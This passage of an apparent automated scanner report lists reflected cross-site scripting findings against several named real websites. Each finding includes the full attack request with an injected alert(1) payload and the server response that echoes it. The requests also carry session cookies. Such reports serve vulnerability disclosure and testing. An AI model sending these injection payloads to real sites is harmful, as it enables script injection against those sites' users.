2.193. http://www.meetic-partners.com/call/adj/97831/673819/MSN_uk.meeticcorp/300x250/877134046/no [http://clk.atdmt.com/go/115855006/direct;wi.300;hi.250;01;ai.197578039.152638442;ct.2/01?href parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.meetic-partners.com
Path:   /call/adj/97831/673819/MSN_uk.meeticcorp/300x250/877134046/no

Issue detail

The value of the http://clk.atdmt.com/go/115855006/direct;wi.300;hi.250;01;ai.197578039.152638442;ct.2/01?href request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ea3c7'%3balert(1)//069506a5e91 was submitted in the http://clk.atdmt.com/go/115855006/direct;wi.300;hi.250;01;ai.197578039.152638442;ct.2/01?href parameter. This input was echoed as ea3c7';alert(1)//069506a5e91 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /call/adj/97831/673819/MSN_uk.meeticcorp/300x250/877134046/no?http://clk.atdmt.com/go/115855006/direct;wi.300;hi.250;01;ai.197578039.152638442;ct.2/01?href=ea3c7'%3balert(1)//069506a5e91 HTTP/1.1
Host: www.meetic-partners.com
Proxy-Connection: keep-alive
Referer: http://m.adnxs.com/tt?member=280&inv_code=UK9R25&cb=973146214
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sasd=%24a%3D0t%3B%24cn%3D0%5F0%3B%24isp%3D0%3B%24qc%3D1309090337%3B%24ql%3Dhigh%3B%24qpc%3D95122%3B%24qpp%3D408%3B%24qt%3D152%5F2199%5F15404t; ASPSESSIONIDSATBACTQ=BPMHCAGALNPNCJJHJEBKCPOL; pbwmaj6=y; pbw=%24b%3D16999%3B%24o%3D11061%3B%24sh%3D1200%3B%24sw%3D1920; pdomid=13; pid=6525761750539601382; TestIfCookie=ok; TestIfCookieP=ok; ASPSESSIONIDCSARTSQB=MAJBBJJAENBAFMGJECJNJNDE

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Pragma: no-cache
Content-Type: application/x-javascript
Expires: Mon, 31 Dec 1979 23:00:00 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Wed, 03 Aug 2011 12:58:45 GMT
Connection: close


var innerCode='';

function navigatorFlashVersion(){navigatorFlashVersion.gfp=function(){var v=[0,0,0];if(navigator.plugins&&navigator.mimeTypes.length){var x=navigator.plugins["Shockwave Flash"]
...[SNIP]...
<a target="_blank" href="http://clk.atdmt.com/go/115855006/direct;wi.300;hi.250;01;ai.197578039.152638442;ct.2/01?href=ea3c7';alert(1)//069506a5e91http://www.meetic-partners.com/diff/58/673819/go138.asp?673819%3B97831%3B6525761750539601382%3B877134046%3BM%3Bsystemtarget=%24a%3D0t%3B%24cn%3D0_0%3B%24isp%3D0%3B%24qc%3D1309090337%3B%24ql%3Dhigh%3B%2
...[SNIP]...

2.194. http://www.meetic-partners.com/call/adj/97831/673819/MSN_uk.meeticcorp/300x250/877134046/no [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.meetic-partners.com
Path:   /call/adj/97831/673819/MSN_uk.meeticcorp/300x250/877134046/no

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 545d8'%3balert(1)//bf962870449 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 545d8';alert(1)//bf962870449 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /call/adj/97831/673819/MSN_uk.meeticcorp/300x250/877134046/no?http://clk.atdmt.com/go/115855006/direct;wi.300;hi.250;01;ai.197578039.152638442;ct.2/01?href=&545d8'%3balert(1)//bf962870449=1 HTTP/1.1
Host: www.meetic-partners.com
Proxy-Connection: keep-alive
Referer: http://m.adnxs.com/tt?member=280&inv_code=UK9R25&cb=973146214
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sasd=%24a%3D0t%3B%24cn%3D0%5F0%3B%24isp%3D0%3B%24qc%3D1309090337%3B%24ql%3Dhigh%3B%24qpc%3D95122%3B%24qpp%3D408%3B%24qt%3D152%5F2199%5F15404t; ASPSESSIONIDSATBACTQ=BPMHCAGALNPNCJJHJEBKCPOL; pbwmaj6=y; pbw=%24b%3D16999%3B%24o%3D11061%3B%24sh%3D1200%3B%24sw%3D1920; pdomid=13; pid=6525761750539601382; TestIfCookie=ok; TestIfCookieP=ok; ASPSESSIONIDCSARTSQB=MAJBBJJAENBAFMGJECJNJNDE

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Pragma: no-cache
Content-Type: application/x-javascript
Expires: Mon, 31 Dec 1979 23:00:00 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Wed, 03 Aug 2011 12:59:19 GMT
Connection: close


var innerCode='';

function navigatorFlashVersion(){navigatorFlashVersion.gfp=function(){var v=[0,0,0];if(navigator.plugins&&navigator.mimeTypes.length){var x=navigator.plugins["Shockwave Flash"]
...[SNIP]...
<a target="_blank" href="http://clk.atdmt.com/go/115855006/direct;wi.300;hi.250;01;ai.197578039.152638442;ct.2/01?href=&545d8';alert(1)//bf962870449=1http://www.meetic-partners.com/diff/58/673819/go139.asp?673819%3B97831%3B6525761750539601382%3B877134046%3BM%3Bsystemtarget=%24a%3D0t%3B%24cn%3D0_0%3B%24isp%3D0%3B%24qc%3D1309090337%3B%24ql%3Dhigh%3B
...[SNIP]...

2.195. http://www.meetic-partners.com/diff/58/645868/show23.asp [645868;97831;0;%5btimestamp%5d;M;systemtarget parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.meetic-partners.com
Path:   /diff/58/645868/show23.asp

Issue detail

The value of the 645868;97831;0;%5btimestamp%5d;M;systemtarget request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6ecb0'-alert(1)-'a7842f1522e was submitted in the 645868;97831;0;%5btimestamp%5d;M;systemtarget parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /diff/58/645868/show23.asp?645868;97831;0;%5btimestamp%5d;M;systemtarget=%24a%3D0t%3B%24cn%3D0_0%3B%24isp%3D0%3B%24qc%3D1309090337%3B%24ql%3Dhigh%3B%24qpc%3D95122%3B%24qpp%3D408%3B%24qt%3D152_2199_15404t%3B%24b%3D9999%3B%24o%3D110616ecb0'-alert(1)-'a7842f1522e HTTP/1.1
Host: www.meetic-partners.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.meetic-partners.com/a/diff/58/645868/ishow23.asp?645868;97831;0;%5btimestamp%5d;M;systemtarget=%24a%3D0t%3B%24cn%3D0_0%3B%24isp%3D0%3B%24qc%3D1309090337%3B%24ql%3Dhigh%3B%24qpc%3D95122%3B%24qpp%3D408%3B%24qt%3D152_2199_15404t%3B%24b%3D9999%3B%24o%3D11061
Cookie: sasd=%24a%3D0t%3B%24cn%3D0%5F0%3B%24isp%3D0%3B%24qc%3D1309090337%3B%24ql%3Dhigh%3B%24qpc%3D95122%3B%24qpp%3D408%3B%24qt%3D152%5F2199%5F15404t; pbw=%24b%3D9999%3B%24o%3D11061; TestIfCookieP=ok; TestIfCookie=ok; ASPSESSIONIDSATBACTQ=CFHLCAGACLNPPDPPADAEMKML

Response

HTTP/1.1 200 OK
Cache-Control: private
Pragma: no-cache
Content-Type: application/x-javascript
Expires: Mon, 31 Dec 1979 23:00:00 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Wed, 03 Aug 2011 12:40:57 GMT
Connection: close


var innerCode='';

function navigatorFlashVersion(){navigatorFlashVersion.gfp=function(){var v=[0,0,0];if(navigator.plugins&&navigator.mimeTypes.length){var x=navigator.plugins["Shockwave Flash"]
...[SNIP]...
%3B0%3B%5btimestamp%5d%3BM%3Bsystemtarget=%24a%3D0t%3B%24cn%3D0_0%3B%24isp%3D0%3B%24qc%3D1309090337%3B%24ql%3Dhigh%3B%24qpc%3D95122%3B%24qpp%3D408%3B%24qt%3D152_2199_15404t%3B%24b%3D9999%3B%24o%3D110616ecb0'-alert(1)-'a7842f1522e%3B3224895%3Bclickvars=') + '&clickTag=' + escape('http://www.meetic-partners.com/diff/58/645868/go76.asp?645868%3B97831%3B0%3B%5btimestamp%5d%3BM%3Bsystemtarget=%24a%3D0t%3B%24cn%3D0_0%3B%24isp%3D0%3B
...[SNIP]...

2.196. http://www.meetic-partners.com/diff/58/645868/show23.asp [645868;97831;6855282135832214373;%5btimestamp%5d;M;systemtarget parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.meetic-partners.com
Path:   /diff/58/645868/show23.asp

Issue detail

The value of the 645868;97831;6855282135832214373;%5btimestamp%5d;M;systemtarget request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a1e3d'-alert(1)-'9b801991a87 was submitted in the 645868;97831;6855282135832214373;%5btimestamp%5d;M;systemtarget parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /diff/58/645868/show23.asp?645868;97831;6855282135832214373;%5btimestamp%5d;M;systemtarget=%24a%3D0t%3B%24cn%3D0_0%3B%24isp%3D0%3B%24qc%3D1309090337%3B%24ql%3Dhigh%3B%24qpc%3D95122%3B%24qpp%3D408%3B%24qt%3D152_2199_15404t%3B%24b%3D9999%3B%24o%3D11061%3B%24c%3D42%3Ba1e3d'-alert(1)-'9b801991a87 HTTP/1.1
Host: www.meetic-partners.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.meetic-partners.com/a/diff/58/645868/ishow23.asp?645868;97831;6855282135832214373;%5btimestamp%5d;M;systemtarget=%24a%3D0t%3B%24cn%3D0_0%3B%24isp%3D0%3B%24qc%3D1309090337%3B%24ql%3Dhigh%3B%24qpc%3D95122%3B%24qpp%3D408%3B%24qt%3D152_2199_15404t%3B%24b%3D9999%3B%24o%3D11061%3B%24c%3D42%3B
Cookie: sasd=%24a%3D0t%3B%24cn%3D0%5F0%3B%24isp%3D0%3B%24qc%3D1309090337%3B%24ql%3Dhigh%3B%24qpc%3D95122%3B%24qpp%3D408%3B%24qt%3D152%5F2199%5F15404t; pbw=%24b%3D9999%3B%24o%3D11061%3B%24sh%3D1200%3B%24sw%3D1920; TestIfCookieP=ok; TestIfCookie=ok; ASPSESSIONIDSATBACTQ=CFHLCAGACLNPPDPPADAEMKML; pbwmaj6=y; pdomid=18; pid=6855282135832214373

Response

HTTP/1.1 200 OK
Cache-Control: private
Pragma: no-cache
Content-Type: application/x-javascript
Expires: Mon, 31 Dec 1979 23:00:00 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Wed, 03 Aug 2011 12:41:03 GMT
Connection: close


var innerCode='';

function navigatorFlashVersion(){navigatorFlashVersion.gfp=function(){var v=[0,0,0];if(navigator.plugins&&navigator.mimeTypes.length){var x=navigator.plugins["Shockwave Flash"]
...[SNIP]...
tamp%5d%3BM%3Bsystemtarget=%24a%3D0t%3B%24cn%3D0_0%3B%24isp%3D0%3B%24qc%3D1309090337%3B%24ql%3Dhigh%3B%24qpc%3D95122%3B%24qpp%3D408%3B%24qt%3D152_2199_15404t%3B%24b%3D9999%3B%24o%3D11061%3B%24c%3D42%3Ba1e3d'-alert(1)-'9b801991a87%3B4021250%3Bclickvars=">
...[SNIP]...

2.197. http://www.meetic-partners.com/diff/58/645868/show23.asp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.meetic-partners.com
Path:   /diff/58/645868/show23.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4699e'-alert(1)-'aa0e0877ff0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /diff/58/645868/show23.asp?645868;97831;0;[timestamp];M;systemtarget=%24a%3D0t%3B%24cn%3D0_0%3B%24isp%3D0%3B%24qc%3D1309090337%3B%24ql%3Dhigh%3B%24qpc%3D95122%3B%24qpp%3D408%3B%24qt%3D152_2199_15404t%3B%24b%3D16999%3B%24o%3D11061&4699e'-alert(1)-'aa0e0877ff0=1 HTTP/1.1
Host: www.meetic-partners.com
Proxy-Connection: keep-alive
Referer: http://www.meetic-partners.com/a/diff/58/645868/ishow23.asp?645868;97831;0;[timestamp];M;systemtarget=%24a%3D0t%3B%24cn%3D0_0%3B%24isp%3D0%3B%24qc%3D1309090337%3B%24ql%3Dhigh%3B%24qpc%3D95122%3B%24qpp%3D408%3B%24qt%3D152_2199_15404t%3B%24b%3D16999%3B%24o%3D11061
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sasd=%24a%3D0t%3B%24cn%3D0%5F0%3B%24isp%3D0%3B%24qc%3D1309090337%3B%24ql%3Dhigh%3B%24qpc%3D95122%3B%24qpp%3D408%3B%24qt%3D152%5F2199%5F15404t; pbw=%24b%3D16999%3B%24o%3D11061; TestIfCookieP=ok; TestIfCookie=ok; ASPSESSIONIDSATBACTQ=BPMHCAGALNPNCJJHJEBKCPOL

Response

HTTP/1.1 200 OK
Cache-Control: private
Pragma: no-cache
Content-Type: application/x-javascript
Expires: Mon, 31 Dec 1979 23:00:00 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Wed, 03 Aug 2011 12:37:34 GMT
Connection: close


var innerCode='';

function navigatorFlashVersion(){navigatorFlashVersion.gfp=function(){var v=[0,0,0];if(navigator.plugins&&navigator.mimeTypes.length){var x=navigator.plugins["Shockwave Flash"]
...[SNIP]...
31%3B0%3B[timestamp]%3BM%3Bsystemtarget=%24a%3D0t%3B%24cn%3D0_0%3B%24isp%3D0%3B%24qc%3D1309090337%3B%24ql%3Dhigh%3B%24qpc%3D95122%3B%24qpp%3D408%3B%24qt%3D152_2199_15404t%3B%24b%3D16999%3B%24o%3D11061&4699e'-alert(1)-'aa0e0877ff0=1%3B3224693%3Bclickvars=') + '&clickTag=' + escape('http://www.meetic-partners.com/diff/58/645868/go75.asp?645868%3B97831%3B0%3B[timestamp]%3BM%3Bsystemtarget=%24a%3D0t%3B%24cn%3D0_0%3B%24isp%3D0%3B%2
...[SNIP]...

2.198. http://www.pageshoppe.me/register.php [pid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pageshoppe.me
Path:   /register.php

Issue detail

The value of the pid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 86a38"><script>alert(1)</script>5c3bbcef668 was submitted in the pid parameter. This input was echoed as 86a38\"><script>alert(1)</script>5c3bbcef668 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /register.php?pid=2186a38"><script>alert(1)</script>5c3bbcef668 HTTP/1.1
Host: www.pageshoppe.me
Proxy-Connection: keep-alive
Referer: http://www.pageshoppe.com/vpn.html?gclid=CJnP9v-9sKoCFcYQNAodzn4A8A
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 02 Aug 2011 11:21:09 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.3.3
X-Powered-By: PHP/5.3.3
Content-Length: 7906
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<input type="hidden" name="pid" id="pid" value="2186a38\"><script>alert(1)</script>5c3bbcef668" />
...[SNIP]...

2.199. http://www.web.com/resources/customersuccessstories.aspx [_TSM_HiddenField_ parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.web.com
Path:   /resources/customersuccessstories.aspx

Issue detail

The value of the _TSM_HiddenField_ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a6226'%3balert(1)//20733e1b871 was submitted in the _TSM_HiddenField_ parameter. This input was echoed as a6226';alert(1)//20733e1b871 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/customersuccessstories.aspx?_TSM_HiddenField_=ctl00_ScriptManager1_HiddenFielda6226'%3balert(1)//20733e1b871&_TSM_CombinedScripts_=%3b%3bAjaxControlToolkit%2c+Version%3d1.0.10618.0%2c+Culture%3dneutral%2c+PublicKeyToken%3d28f01b0e84b6d53e%3aen-US%3aec042f9f-8042-47c0-ba41-60e29a80f579%3a865923e8%3a411fea1c%3ae7c87f07%3a91bd373d%3ad72169a4 HTTP/1.1
Host: www.web.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.web.com/resources/customersuccessstories.aspx
Cookie: ASP.NET_SessionId=rfqs4s450cceja55vxbs5nuc; inurl=; affdata=; mbox=check#true#1312406483|session#1312406398628-704291#1312408283|PC#1312406398628-704291.19#1314998423; s_cc=true; s_p8=Other%20Referrer; s_sq=registerwebdotcom-production%3D%2526pid%253DWeb.com%25253A%252520Marketing%25253A%252520Website%252520Promotion%2526pidt%253D1%2526oid%253Dhttp%25253A//www.web.com/resources/customersuccessstories.aspx%2526ot%253DA; __utma=171595558.470829066.1312406403.1312406403.1312406403.1; __utmb=171595558.4.9.1312406432004; __utmc=171595558; __utmz=171595558.1312406403.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName

Response

HTTP/1.1 200 OK
Cache-Control: public
Content-Type: application/x-javascript
Expires: Thu, 02 Aug 2012 21:21:42 GMT
Last-Modified: Tue, 02 Aug 2011 19:11:24 GMT
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Wed, 03 Aug 2011 21:21:42 GMT
Content-Length: 107323

//START AjaxControlToolkit.Common.Common.js
Type.registerNamespace('AjaxControlToolkit');AjaxControlToolkit.BoxSide = function() {
}
AjaxControlToolkit.BoxSide.prototype = {
Top : 0,
Right : 1,

...[SNIP]...
ControlToolkit.CollapsiblePanel.CollapsiblePanelBehavior.js
if(typeof(Sys)!=='undefined')Sys.Application.notifyScriptLoaded();
(function() {var fn = function() {$get('ctl00_ScriptManager1_HiddenFielda6226';alert(1)//20733e1b871').value += ';;AjaxControlToolkit, Version=1.0.10618.0, Culture=neutral, PublicKeyToken=28f01b0e84b6d53e:en-US:ec042f9f-8042-47c0-ba41-60e29a80f579:865923e8:411fea1c:e7c87f07:91bd373d:d72169a4';Sys.App
...[SNIP]...

2.200. http://m.adnxs.com/tt [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://m.adnxs.com
Path:   /tt

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d1bff"><script>alert(1)</script>3dd008c56b7 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /tt?member=280&inv_code=UK9NWR&cb=154272433 HTTP/1.1
Host: m.adnxs.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=d1bff"><script>alert(1)</script>3dd008c56b7
Cookie: uuid2=7861267450522120178; anj=Kfu=8fG7]PCxrx)0s]#%2L_'x%SEV/hnJip3@jpr<Bz<tOWdo3F<$g^.cyJ]8s06c

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Thu, 04-Aug-2011 12:50:19 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=7861267450522120178; path=/; expires=Tue, 01-Nov-2011 12:50:19 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: icu=ChIImaUDEAoYAiACKAIwi4jl8QQQi4jl8QQYAQ..; path=/; expires=Tue, 01-Nov-2011 12:50:19 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/html; charset=utf-8
Set-Cookie: anj=Kfu=8fG68%Cxrx)0s]#%2L_'x%SEV/hnJPh4FSn39!r-OkI+zwP7ooYx+G.JAX9_'PyNay[0jWBajLYt; path=/; expires=Tue, 01-Nov-2011 12:50:19 GMT; domain=.adnxs.com; HttpOnly
Date: Wed, 03 Aug 2011 12:50:19 GMT
Content-Length: 1048

<html><body style="margin-left: 0%; margin-right: 0%; margin-top: 0%; margin-bottom: 0%"><script type="text/javascript" src="http://rover.ebay.com/ar/1/77164/4?mpt=1312375819&Perf_Tracker_1=-1&Perf_Tracker_2=526736&Perf_Tracker_3=1.220703&Perf_Tracker_4=0&Perf_Tracker_5=u&Perf_Tracker_6=3&Perf_Tracker_7=1264&Perf_Tracker_8=0&Perf_Tracker_9=http://www.google.com/search?hl=en&q=d1bff"><script>alert(1)</script>3dd008c56b7&Perf_Tracker_10=66647&ext_id=7289596607623075069&siteid=0&icep_siteid=0&ipn=admain&adtype=3&size=300x250&adid=344372&mpvc=http://ib.adnxs.com/click%3FAAAAAACI8z8AAAAAAIjzPwAAAKCZmQFABoAqbtxi-z8GgCpu3G
...[SNIP]...

2.201. http://www.russellgrant.com/ [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.russellgrant.com
Path:   /

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e4ac5"><script>alert(1)</script>7a14d091d7e was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET / HTTP/1.1
Host: www.russellgrant.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=e4ac5"><script>alert(1)</script>7a14d091d7e
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Wed, 03 Aug 2011 13:11:22 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.17-0.dotdeb.0 with Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.17-0.dotdeb.0
Last-Modified: Wed, 03 Aug 2011 13:11:22 GMT
Connection: close
Content-Type: text/html
Content-Length: 62295

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html><head><title>Psychic Readings, Astrology Predictions and Horoscopes - Russell Grant</title>
<meta http-
...[SNIP]...
.google-analytics.com/__utm.gif?utmwv=3&utmn=1123795032&utme=&utmcs=-&utmsr=-&utmsc=-&utmul=-&utmje=0&utmfl=-&utmdt=-&utmhn=russellgrant.com&utmhid=1123795032&utmr=http://www.google.com/search?hl=en&q=e4ac5"><script>alert(1)</script>7a14d091d7e&utmp=/nojs_tracker/&utmac=UA-1322086-1&utmcc=__utma%3D55449304.1411259668.1312377083.1312377083.1312377083.2%3B%2B__utmz%3D55449304.1312377083.2.2.utmcsr%3D_SOURCE_%7Cutmccn%3D_CAMPAIGN_%7Cutmcmd%3D_M
...[SNIP]...

2.202. http://adomas.org/javascript-mouse-wheel/ [REST URL parameter 1]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://adomas.org
Path:   /javascript-mouse-wheel/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload cc7e1<script>alert(1)</script>0d14b635a4b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /javascript-mouse-wheelcc7e1<script>alert(1)</script>0d14b635a4b/ HTTP/1.1
Host: adomas.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Server: redir-httpd
Date: Sun, 07 Aug 2011 01:21:15 GMT
Location: http://www.adomas.org/javascript-mouse-wheelcc7e1<script>alert(1)</script>0d14b635a4b/
Last-Modified: Sat, 06 Aug 2011 22:03:19 GMT
Content-Length: 243
Content-Type: text/html; charset=utf-8

<html><body>You are now redirected to<br><a href="http://www.adomas.org/javascript-mouse-wheelcc7e1<script>alert(1)</script>0d14b635a4b/">http://www.adomas.org/javascript-mouse-wheelcc7e1<script>alert(1)</script>0d14b635a4b/</a>
